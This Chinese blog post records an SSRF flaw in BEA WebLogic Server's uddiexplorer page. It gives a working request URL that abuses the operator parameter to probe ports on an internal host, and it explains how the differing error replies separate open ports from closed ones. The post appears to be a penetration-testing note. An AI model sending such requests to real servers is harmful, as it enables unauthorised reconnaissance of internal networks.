BEA Weblogic Server ssrf漏洞利用

0x00 前言

测试遇到了BEA Weblogic Server ssrf漏洞,记录一下。

0x01 ssrf内网端口探测

探测内网主机 10.10.0.217 2222端口

1
http://zhengbao.wang/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.10.0.217:2222&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

端口开放回显did not have a valid SOAP content-type,如下图

探测1234端口,端口关闭回显could not connect over HTTP to server,如下图

根据回显不同,可做内网端口探测。

其他关于ssrf的利用,可参见博客文章 SSRF的一些利用姿势

本文标题:BEA Weblogic Server ssrf漏洞利用

文章作者:boogle

发布时间:2019年09月26日 - 10:28

最后更新:2019年09月26日 - 20:23

原始链接:http://zhengbao.wang/BEA-Weblogic-Server-ssrf漏洞利用/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗